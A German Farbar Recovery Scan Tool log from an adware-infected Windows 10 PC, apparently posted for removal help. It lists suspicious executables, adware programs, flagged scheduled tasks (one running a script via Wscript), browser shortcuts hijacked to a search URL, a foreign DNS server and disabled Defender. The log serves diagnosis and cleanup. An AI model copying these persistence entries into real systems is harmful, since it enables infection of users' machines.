2016-10-19 13:10 - 2016-09-18 05:51 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2016-10-19 13:10 - 2016-07-16 08:04 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2016-10-18 12:36 - 2016-07-16 13:47 - 00000000 ___HD C:\WINDOWS\ELAMBKUP
2016-10-17 13:22 - 2016-09-17 20:56 - 01672382 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-10-17 13:22 - 2016-07-17 00:51 - 00606284 _____ C:\WINDOWS\system32\perfh007.dat
2016-10-17 13:22 - 2016-07-17 00:51 - 00120056 _____ C:\WINDOWS\system32\perfc007.dat
2016-10-14 20:45 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\System
2016-10-14 18:39 - 2016-07-16 13:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-10-14 17:55 - 2016-09-17 21:04 - 00000000 ____D C:\Users\maikp\AppData\Local\VirtualStore
2016-10-14 17:53 - 2016-09-17 21:04 - 00000000 ____D C:\Users\maikp\AppData\Local\Packages
2016-10-14 17:53 - 2016-07-16 13:47 - 00000000 ___HD C:\Program Files\WindowsApps
2016-10-14 17:53 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-10-07 20:57 - 2016-09-18 08:03 - 00000120 ____R C:\Users\maikp\OneDrive\Documents\Eigenes Notizbuch.url
2016-10-05 16:48 - 2016-07-16 13:45 - 00000000 ____D C:\WINDOWS\INF
2016-10-03 18:19 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\rescache
2016-10-02 18:09 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\NDF
2016-10-01 19:22 - 2016-09-17 21:04 - 00000000 __RHD C:\Users\Public\AccountPictures
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\system32\F12
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\setup
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\setup
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\oobe
2016-09-30 18:15 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-09-30 18:15 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2016-09-30 18:15 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2016-09-30 18:15 - 2016-07-16 08:04 - 00000000 ____D C:\WINDOWS\system32\Dism
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Provisioning
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\bcastdvr
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2016-09-30 18:14 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2016-09-28 06:08 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\appcompat
2016-09-27 15:31 - 2016-09-17 21:08 - 00002394 _____ C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2016-09-27 15:27 - 2016-07-16 13:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-09-27 13:05 - 2016-07-16 13:47 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ___SD C:\WINDOWS\system32\dsc
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ___RD C:\Program Files\Windows Defender
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\et-EE
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\es-MX
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\en-GB
2016-09-27 13:03 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender
2016-09-27 12:56 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2016-09-27 12:56 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\MUI
2016-09-27 12:24 - 2016-07-16 13:47 - 00000000 ____D C:\ProgramData\USOPrivate
2016-09-27 12:24 - 2016-07-16 13:47 - 00000000 ____D C:\Program Files\Windows NT
2016-09-27 12:23 - 2016-07-16 08:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2016-09-27 12:22 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2016-09-27 12:22 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\Registration
2016-09-27 12:21 - 2016-09-17 18:55 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicyUsers
2016-09-27 12:17 - 2016-09-17 18:55 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2016-09-27 12:17 - 2016-07-16 13:47 - 00000000 __RHD C:\Users\Public\Libraries
2016-09-27 12:14 - 2016-09-17 18:36 - 00000000 ____D C:\Users\Default.migrated
2016-09-27 12:13 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\spool
2016-09-27 12:09 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\PrintDialog
2016-09-27 12:08 - 2016-09-18 05:47 - 00000000 ____D C:\AMD
2016-09-27 12:08 - 2016-07-16 13:47 - 00000000 ___RD C:\WINDOWS\MiracastView

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-10-08 20:52 - 2016-10-08 20:52 - 7176704 _____ () C:\Users\maikp\AppData\Roaming\agent.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 0070704 _____ () C:\Users\maikp\AppData\Roaming\Config.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 0190394 _____ () C:\Users\maikp\AppData\Roaming\Doublephase.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 0015792 _____ () C:\Users\maikp\AppData\Roaming\InstallationConfiguration.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 0140288 _____ () C:\Users\maikp\AppData\Roaming\Installer.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 1928315 _____ () C:\Users\maikp\AppData\Roaming\KeyApphase.tst
2016-10-08 20:52 - 2016-10-08 20:52 - 0018432 _____ () C:\Users\maikp\AppData\Roaming\Main.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 0005568 _____ () C:\Users\maikp\AppData\Roaming\md.xml
2016-10-08 20:52 - 2016-10-08 20:52 - 0126464 _____ () C:\Users\maikp\AppData\Roaming\noah.dat
2016-10-08 20:52 - 2016-10-08 20:52 - 1897576 _____ () C:\Users\maikp\AppData\Roaming\Sao-Cof.bin
2016-10-08 20:52 - 2016-10-08 20:52 - 0032038 _____ () C:\Users\maikp\AppData\Roaming\uninstall_temp.ico
2016-10-09 07:48 - 2016-10-12 15:46 - 0440832 _____ () C:\ProgramData\smp2.exe

Dateien, die verschoben oder gelöscht werden sollten:
====================
C:\ProgramData\smp2.exe


Einige Dateien in TEMP:
====================
C:\Users\maikp\AppData\Local\Temp\1150.tmp.exe
C:\Users\maikp\AppData\Local\Temp\14759530998e8c0tmp.exe
C:\Users\maikp\AppData\Local\Temp\250C.tmp.exe
C:\Users\maikp\AppData\Local\Temp\2FDC.tmp.exe
C:\Users\maikp\AppData\Local\Temp\331GYZWFPU.exe
C:\Users\maikp\AppData\Local\Temp\43C1.tmp.exe
C:\Users\maikp\AppData\Local\Temp\5482.tmp.exe
C:\Users\maikp\AppData\Local\Temp\5A2CUUZ2WJ.exe
C:\Users\maikp\AppData\Local\Temp\5B35.tmp.exe
C:\Users\maikp\AppData\Local\Temp\6347.tmp.exe
C:\Users\maikp\AppData\Local\Temp\693.tmp.exe
C:\Users\maikp\AppData\Local\Temp\84.tmp.exe
C:\Users\maikp\AppData\Local\Temp\89E.tmp.exe
C:\Users\maikp\AppData\Local\Temp\8B91.tmp.exe
C:\Users\maikp\AppData\Local\Temp\9043.tmp.exe
C:\Users\maikp\AppData\Local\Temp\93E3.tmp.exe
C:\Users\maikp\AppData\Local\Temp\9C98.tmp.exe
C:\Users\maikp\AppData\Local\Temp\9DAA.tmp.exe
C:\Users\maikp\AppData\Local\Temp\A611.tmp.exe
C:\Users\maikp\AppData\Local\Temp\B124.tmp.exe
C:\Users\maikp\AppData\Local\Temp\B4AD.tmp.exe
C:\Users\maikp\AppData\Local\Temp\BA9A.tmp.exe
C:\Users\maikp\AppData\Local\Temp\C144.tmp.exe
C:\Users\maikp\AppData\Local\Temp\C8BC.tmp.exe
C:\Users\maikp\AppData\Local\Temp\CED1.tmp.exe
C:\Users\maikp\AppData\Local\Temp\D2D6.tmp.exe
C:\Users\maikp\AppData\Local\Temp\DDA9.tmp.exe
C:\Users\maikp\AppData\Local\Temp\E9E.tmp.exe
C:\Users\maikp\AppData\Local\Temp\EDAE.tmp.exe
C:\Users\maikp\AppData\Local\Temp\EF9.tmp.exe
C:\Users\maikp\AppData\Local\Temp\F29B.tmp.exe
C:\Users\maikp\AppData\Local\Temp\fsd1C3A.exe
C:\Users\maikp\AppData\Local\Temp\fsd1F76.exe
C:\Users\maikp\AppData\Local\Temp\fsd4F50.exe
C:\Users\maikp\AppData\Local\Temp\fsdE81F.exe
C:\Users\maikp\AppData\Local\Temp\fsdE991.exe
C:\Users\maikp\AppData\Local\Temp\fsdEF1F.exe
C:\Users\maikp\AppData\Local\Temp\HY4UTN20J3.exe
C:\Users\maikp\AppData\Local\Temp\ICReinstall_250C.tmp.exe
C:\Users\maikp\AppData\Local\Temp\INW10DC1YD.exe
C:\Users\maikp\AppData\Local\Temp\istB73E.tmp.exe
C:\Users\maikp\AppData\Local\Temp\nskE0D6.tmp.exe
C:\Users\maikp\AppData\Local\Temp\nsn6877.tmp.exe
C:\Users\maikp\AppData\Local\Temp\S3RC3RJNY0.exe
C:\Users\maikp\AppData\Local\Temp\sdf82D1.exe
C:\Users\maikp\AppData\Local\Temp\singleProxy.exe
C:\Users\maikp\AppData\Local\Temp\singleProxyUpdater.exe


==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll
[2016-09-30 06:31] - [2016-09-30 06:31] - 0646136 ____A (Microsoft Corporation) EC1F4B814049159FD303B63DDBB35E4B

C:\WINDOWS\SysWOW64\dnsapi.dll
[2016-09-30 06:31] - [2016-09-30 06:31] - 0496872 ____A (Microsoft Corporation) AA2C3100C6622B5B7F5B2603EB9024CA

C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert


LastRegBack: 2016-10-18 14:33

==================== Ende von FRST.txt ============================
Addition

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 17-10-2016
durchgeführt von maikp (19-10-2016 13:37:35)
Gestartet von C:\Users\maikp\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-27 10:24:28)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1190326282-1682839636-2826347982-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1190326282-1682839636-2826347982-503 - Limited - Disabled)
Gast (S-1-5-21-1190326282-1682839636-2826347982-501 - Limited - Disabled)
maikp (S-1-5-21-1190326282-1682839636-2826347982-1002 - Administrator - Enabled) => C:\Users\maikp

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

AMD Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
Avira Connect (HKLM-x32\...\{ee247a19-722f-4096-884b-47ec3b7ec396}) (Version: 1.2.73.15322 - Avira Operations GmbH & Co. KG)
Avira Connect (x32 Version: 1.2.73.15322 - Avira Operations GmbH & Co. KG) Hidden
Body Text Feathering (HKLM-x32\...\PopupProduct) (Version: 1.0.0.0 - Body Text Feathering) <==== ACHTUNG
DailyBee - DailyBee for Desktop (HKLM-x32\...\DailyBee) (Version: 9.1.10cm - DailyBee)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
Epson Software Updater (HKLM-x32\...\{B4F0E794-11F5-4971-85EC-6D7F2E4DAC68}) (Version: 4.4.3 - SEIKO EPSON CORPORATION)
EPSON XP-530 Series Printer Uninstall (HKLM\...\EPSON XP-530 Series) (Version:  - Seiko Epson Corporation)
EPSON-Handbücher (HKLM-x32\...\{84CECC1B-21EF-41B1-9A91-3E724E5D99D3}) (Version: 1.52.0.0 - SEIKO EPSON CORPORATION)
FunFeedr (HKLM-x32\...\FunFeedr) (Version: 3.0.1 - FunFeedr)
Mozilla Firefox 49.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 49.0.1 (x86 de)) (Version: 49.0.1 - Mozilla)
Revo Uninstaller 2.0.1 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.1 - VS Revo Group, Ltd.)
Traffic Exchange (HKLM-x32\...\{96627CEF-1947-4E94-BA3C-259FF5EAAEF6}) (Version: 1.0.0 - Microleaves)
Usenet.nl (HKLM-x32\...\Usenet.nl_is1) (Version:  - )
WebDiscover Browser 2.167.2 (HKLM\...\{fd13f4a2-b0d8-4cad-9ccf-d4128eaf25ff}_is1) (Version: 2.167.2 - WebDiscover Media)
WebShield (HKLM-x32\...\WebShield) (Version:  - )
Y2Go (HKLM-x32\...\Y2Go) (Version:  - Y2Go)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-1190326282-1682839636-2826347982-1002_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {0017173C-CAAE-4FF8-B11D-840CE6D30C93} - System32\Tasks\ChelfNotify Task => C:\ProgramData\ChelfNotify\BrowserUpdate.exe [2016-06-30] (Tencent) <==== ACHTUNG
Task: {1855628C-47BF-4CD0-B789-43CA8B7CAF0C} - System32\Tasks\Traffic Exchange Updater => C:\Program Files (x86)\Microleaves\Traffic Exchange\Traffic Exchange Updater.exe [2016-10-06] (Microleaves)
Task: {1EF81F3F-D1F9-40CE-95A6-5531247BBBBE} - System32\Tasks\Y2Go\Updater\Y2GoUpdater => C:\Program Files (x86)\Y2GoUpdater\updater.exe [2016-10-07] ()
Task: {1F9D81BA-4F7C-422B-877F-BEFE0DE612B0} - System32\Tasks\GEN_Interval => C:\Users\maikp\AppData\Local\Programs\GEN\GEN.exe [2016-07-18] (                                                            )
Task: {355B39B3-3452-48F0-ACD6-F1932523C419} - System32\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0} => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSPME.EXE [2013-11-21] (SEIKO EPSON CORPORATION)
Task: {5BE995DC-CA12-44E6-97D1-FE649B0F938A} - System32\Tasks\SMW_UpdateTask_Time_333836353438353032372d4a5b5b345a417845455a376c => Wscript.exe //B "C:\ProgramData\SearchModule\smhe.js" smu.exe /invoke /f:check_services /l:0 <==== ACHTUNG
Task: {6FFC60CF-B8DE-4C8D-8A2B-F68074C3ED27} - System32\Tasks\Traffic Exchange => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD)
Task: {8126B887-39E4-49BA-8633-9C0685D6E70D} - System32\Tasks\SMW_P => C:\ProgramData\smp2.exe [2016-10-12] () <==== ACHTUNG
Task: {A62A3851-A1C4-4CD5-9978-8C38CA5DA89D} - System32\Tasks\Y2Go\Y2Go\Y2Go => C:\Program Files (x86)\Y2Go\bin\Y2Go.exe [2016-10-07] ()
Task: {A7076610-4363-40B6-ACE9-E968DC802F0C} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-09-20] (Microsoft Corporation)
Task: {ABFE0F01-4EE7-4AF1-A4C8-18849CC5BDFA} - System32\Tasks\GEN => C:\Users\maikp\AppData\Local\Programs\GEN\GEN.exe [2016-07-18] (                                                            )
Task: {AFBE50C1-1D77-4027-BC73-650D9C696D61} - System32\Tasks\Anezotionprodily Verfier => C:\Program Files (x86)\Memucoojick\coits.exe
Task: {B4071208-9165-435B-A30D-817D7AEB92DB} - System32\Tasks\WebDiscover Browser Update Task => C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe [2016-05-27] ()
Task: {BAB458B2-2CD8-4CC2-B8A8-49EFD8FC82EF} - System32\Tasks\WebDiscover Browser Launch Task => C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe [2016-05-27] ()
Task: {D3B72B85-9FE1-4E54-A6A2-4089A313818B} - System32\Tasks\Traffic Exchange Guardian => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD)
Task: {D3D24DB8-113F-4EF0-BB9E-36BA89FB1069} - System32\Tasks\Traffic Exchange Guard => C:\Program Files (x86)\Microleaves\Traffic Exchange\Online-Guardian.exe [2016-08-17] (Microleaves LTD)
Task: {DC5EADB5-EF38-4526-A30C-9351D9C2576C} - System32\Tasks\Jizergh Launcher => C:\Program Files (x86)\Ferqesp\qegph.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\EPSON XP-530 Series Update {DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0}.job => C:\WINDOWS\system32\spool\DRIVERS\x64\3\E_YTSPME.EXE:/EXE:{DD8EE1FC-7C54-41C7-B103-390B8B3CF6D0} /F:UpdateWORKGROUP\DESKTOP-CHK5R9U$
Searches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

ShortcutWithArgument: C:\Users\maikp\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epf&s=ga9zftptn095001au,ff9750b9-f837-4047-8c09-0146ff18dda0,
ShortcutWithArgument: C:\Users\maikp\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Microsoft Edge.lnk -> C:\Windows\explorer.exe (Microsoft Corporation) -> "microsoft-edge:hxxp://www%2dsearching.com/?prd=set_epe&s=GA9zftptn095001AU,ff9750b9-f837-4047-8c09-0146ff18dda0,"
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=ga9zftptn095001au,ff9750b9-f837-4047-8c09-0146ff18dda0,
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www-searching.com/?prd=set_epf&s=ga9zftptn095001au,ff9750b9-f837-4047-8c09-0146ff18dda0,

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-07-16 13:42 - 2016-07-16 13:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-09-30 06:31 - 2016-09-15 19:25 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-10-08 20:52 - 2016-10-07 19:08 - 03786752 _____ () C:\ProgramData\Logic Handler\set.exe
2016-10-14 17:54 - 2016-10-09 10:57 - 00159232 _____ () C:\Program Files (x86)\InterHop\InterHop.exe
2016-10-19 13:05 - 2016-10-19 13:05 - 00637440 _____ () C:\Program Files (x86)\03AA02FC-1475952944-05C3-7606-B70700080009\kns9F11.tmp
2016-08-12 21:23 - 2016-10-19 13:04 - 00360448 _____ () C:\Program Files (x86)\WebShield\WebShield.exe
2016-09-26 09:00 - 2016-09-28 10:08 - 00057856 _____ () C:\ProgramData\NetworkPacketManitor\Nettrans.exe
2016-10-08 20:59 - 2016-10-08 20:59 - 00470592 _____ () C:\WINDOWS\SysWoW64\NetUtils2016.exe
2016-08-11 15:04 - 2016-08-11 15:04 - 00170496 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Geunfy.exe
2016-05-19 16:41 - 2016-05-19 16:41 - 00134656 _____ () C:\Users\maikp\AppData\Local\Apps\2.0\abril.exe
2016-10-14 17:53 - 2016-10-14 04:25 - 00693976 _____ () C:\Program Files (x86)\WinSaber\WinSaber.exe
2015-12-26 10:59 - 2015-12-26 10:59 - 00158720 _____ () C:\Users\maikp\AppData\Local\03AA02FC-1476882363-05C3-7606-B70700080009\qnsx1F3F.tmp
2016-10-08 20:57 - 2016-05-27 11:41 - 00985312 _____ () C:\Program Files\WebDiscoverBrowser\2.167.2\browser.exe
2016-08-11 15:04 - 2016-08-11 15:04 - 00668672 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yjetipudl.dll
2016-10-07 09:18 - 2016-10-07 09:18 - 02329584 _____ () C:\Program Files (x86)\Y2Go\bin\Y2Go.exe
2016-09-30 06:31 - 2016-09-15 19:25 - 02681200 _____ () C:\WINDOWS\SYSTEM32\CoreUIComponents.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 01864384 _____ () C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\amd64\ClientTelemetry.dll
2016-08-11 15:04 - 2016-08-11 15:04 - 00143872 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yjetipudl.exe
2016-08-11 15:04 - 2016-08-11 15:04 - 00112128 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yurejjaeb.exe
2016-09-27 13:02 - 2016-09-27 13:02 - 00134656 _____ () C:\Windows\ShellExperiences\Windows.UI.Shell.SharedUtilities.dll
2016-09-30 06:31 - 2016-09-15 18:39 - 00474112 _____ () C:\Windows\ShellExperiences\QuickActions.dll
2016-09-30 06:31 - 2016-09-15 18:24 - 09760256 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 01401344 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 00757248 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CSGSuggestLib.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 01033216 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Actions.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 02424832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 04853760 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-10-08 20:59 - 2016-10-08 20:59 - 04284416 _____ () C:\Program Files (x86)\mpck\wincom_VL5.exe
2016-10-07 09:17 - 2016-10-07 09:17 - 00287216 _____ () C:\Program Files (x86)\Y2Go\bin\pt.exe
2016-09-29 09:02 - 2016-09-29 09:02 - 47813592 _____ () C:\Users\maikp\AppData\Roaming\DailyBee\DailyBee.exe
2015-11-04 16:43 - 2015-11-04 16:43 - 00102400 _____ () C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Proxy.Native.dll
2016-10-07 09:16 - 2016-10-07 09:16 - 00340976 _____ () C:\Program Files (x86)\Y2Go\bin\UrlHandler.exe
2016-09-28 16:35 - 2016-09-28 16:36 - 00072192 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeHost.exe
2016-09-28 16:35 - 2016-09-28 16:36 - 00178176 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkypeBackgroundTasks.dll
2016-09-28 16:35 - 2016-09-28 16:36 - 35250688 _____ () C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.190.0_x64__kzf8qxf38zg5c\SkyWrap.dll
2016-10-08 20:57 - 2016-05-27 11:36 - 00117248 _____ () C:\Program Files\WebDiscoverBrowser\2.167.2\48.0.2564.10\chrome_elf.dll
2016-08-11 15:04 - 2016-08-11 15:04 - 00258560 _____ () C:\Users\maikp\AppData\Roaming\Geunfy\Yurejjaeb.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 01383616 _____ () C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\ClientTelemetry.dll
2016-09-27 15:30 - 2016-09-27 15:30 - 00118976 _____ () C:\Users\maikp\AppData\Local\Microsoft\OneDrive\17.3.6517.0809_1\FileSyncViews.dll
2016-10-19 13:37 - 2016-10-19 13:37 - 01179648 _____ () C:\Users\maikp\AppData\Local\Temp\is-8C3KE.tmp\GEN.tmp
2016-10-19 13:39 - 2016-10-19 13:39 - 00002560 _____ () C:\Users\maikp\AppData\Local\Temp\is-ATALB.tmp\_isetup\_iscrypt.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1190326282-1682839636-2826347982-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\maikp\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\unbenannt.png
DNS Servers: 188.120.239.115 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{2EA584C8-BECC-4A4C-AF33-4E606E73CDAE}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{436571FA-8515-4E9E-AAD9-2CC79F8602B9}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
